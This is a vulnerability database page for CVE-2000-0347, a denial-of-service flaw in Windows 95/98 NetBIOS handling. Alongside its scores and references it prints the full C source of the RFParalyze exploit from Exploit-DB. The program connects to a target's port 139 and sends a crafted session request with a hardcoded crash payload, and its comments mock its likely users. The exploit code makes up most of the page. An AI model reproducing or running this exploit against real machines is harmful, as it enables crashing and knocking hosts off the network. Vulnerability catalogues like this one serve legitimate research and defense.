CVE-2000-0347 : Detail

CVE-2000-0347

8.35%V3
Network
2000-10-13 02h00 +00:00
2005-11-02 09h00 +00:00

CVE Descriptions

Windows 95 and Windows 98 allow a remote attacker to cause a denial of service via a NetBIOS session request packet with a NULL source name.

CVE Information

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0% and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVEs.

Exploit information

Exploit Database EDB-ID : 19889

Publication date : 2000-05-01 22h00 +00:00
Author : rain forest puppy
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/1163/info

Unpredictable results, including system crashes, lock-ups, reboots, and loss of network connectivity, can occur in Windows 95/98 if a NetBIOS session packet is received with the source host name set to NULL.

/*********************************** www.el8.org **** www.wiretrip.net **/
/*      - el8.org advisory: RFParalyze.c
        code by rain forest puppy <rfp@wiretrip.net>   -
        coolness exhibited by Evan Brewer <dm@el8.org> -

        - Usage: RFParalyze <IP address> <NetBIOS name>

        where <IP address> is the IP address (duh) of the target (note:
        not DNS name).  <NetBIOS name> is the NetBIOS name (again, duh) of
        the server at the IP address given.  A kiddie worth his scripts
        should be able to figure out how to lookup the NetBIOS name.
        Note: NetBIOS name must be in upper case.

        This code was made from a reverse-engineer of 'whisper', a
        binary-only exploit found in the wild.

        I have only tested this code on Linux.  Hey, at least it's
        not in perl... ;)   -rfp
*/

#include <stdio.h>       /* It's such a shame to waste   */
#include <stdlib.h>      /* this usable space. Instead,  */
#include <string.h>      /* we'll just make it more      */
#include <netdb.h>       /* props to the men and women   */
#include <sys/socket.h>  /* (hi Tabi!) of #!adm and      */
#include <sys/types.h>   /* #!w00w00, because they rock  */
#include <netinet/in.h>  /* so much.  And we can't forget*/
#include <unistd.h>      /* our friends at eEye or       */
#include <string.h>      /* Attrition. Oh, +hi Sioda. :) */

/* Magic winpopup message
   This is from \\Beav\beavis and says "yeh yeh"
   Ron and Marty should like the hardcoded values this has ;)
*/
char blowup[]= "\x00\x00\x00\x41\xff\x53\x4d\x42\xd0\x00"
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        "\x00\x00\x19\x00\x04\x42\x45\x41\x56\x00\x04\x42\x45\x41\x56\x49"
        "\x53\x00\x01\x08\x00\x79\x65\x70\x20\x79\x65\x70\x00\x00";

struct sreq /* little structure of netbios session request */
{
        char first[5];
        char yoname[32];
        char sep[2];
        char myname[32];
        char end[1];
};

void Pad_Name(char *name1, char *name2); /* Thanks Antilove/ADM 4 codez!*/

int main(int argc, char *argv[]){
        char buf[4000], myname[33], yoname[33];
        struct sockaddr_in sin;
        int sox, connex, x;
        struct sreq smbreq;

        printf("RFParalyze -- this code by rfp/ADM/Wiretrip/ and dm/el8/\n");

        if (argc < 3) {
                printf("Usage: RFParalyze <IP of target> <NetBIOS name>\n");
                printf(" --IP must be ip address, not dns\n");
                printf(" --NetBIOS name must be in UPPER CASE\n\n");
                exit(1);}

        printf("Greetz to el8.org, Technotronic, w00w00, USSR, and ADM!\n");

        Pad_Name("WICCA",myname); /* greetz to Simple Nomad/NMRC */
        myname[30]='A';           /* how was Beltaine? :) */
        myname[31]='D';

        Pad_Name(argv[2],yoname);
        yoname[30]='A';
        yoname[31]='D';

        printf("Trying %s as NetBIOS name %s \n",argv[1],argv[2]);

        sin.sin_addr.s_addr = inet_addr(argv[1]);
        sin.sin_family = AF_INET;
        sin.sin_port = htons(139);

        sox = socket(AF_INET,SOCK_STREAM,0);
        if((connex = connect(sox,(struct sockaddr_in *)&sin,sizeof(sin))) < 0){
                perror("Problems connecting: ");
                exit(1);}

        memset(buf,0,4000);

        memcpy(smbreq.first,"\x81\x00\x00\x44\x20",5); /*various netbios stuffz*/
        memcpy(smbreq.sep,"\x00\x20",2);               /*no need to worry about*/
        memcpy(smbreq.end,"\x00",1);                   /*what it does :) */
        strncpy(smbreq.myname,myname,32);
        strncpy(smbreq.yoname,yoname,32);

        write(sox,&smbreq,72);  /* send initial request */
        x=read(sox,buf,4000);   /* get their response */

        if(x<1){ printf("Problem, didn't get response\n");
                exit(1);}

        if(buf[0]=='\x82') printf("Enemy engaged, going in for the kill...");
        else {printf("We didn't get back the A-OK, bailing.\n");
                exit(1);}

        write(sox,&blowup,72);  /* send the magic message >:) */
        x=read(sox,buf,4000);   /* we really don't care, but sure */
        close(sox);
        printf("done\n");
}

void Pad_Name(char *name1, char *name2)
{ char c, c1, c2;
  int i, len;
  len = strlen(name1);
  for (i = 0; i < 16; i++) {
    if (i >= len) {
      c1 = 'C'; c2 = 'A'; /* CA is a space */
    } else {
      c = name1[i];
      c1 = (char)((int)c/16 + (int)'A');
      c2 = (char)((int)c%16 + (int)'A');
    }
    name2[i*2] = c1;
    name2[i*2+1] = c2;
  }
  name2[32] = 0;   /* Put in the null ...*/
}

/*********************************** www.el8.org **** www.wiretrip.net **/

Products Mentioned

Configuration 0

Microsoft>>Windows_95 >> Version *

Microsoft>>Windows_98 >> Version *

References

http://marc.info/?l=ntbugtraq&m=95737580922397&w=2
Tags : mailing-list, x_refsource_NTBUGTRAQ
http://www.securityfocus.com/bid/1163
Tags : vdb-entry, x_refsource_BID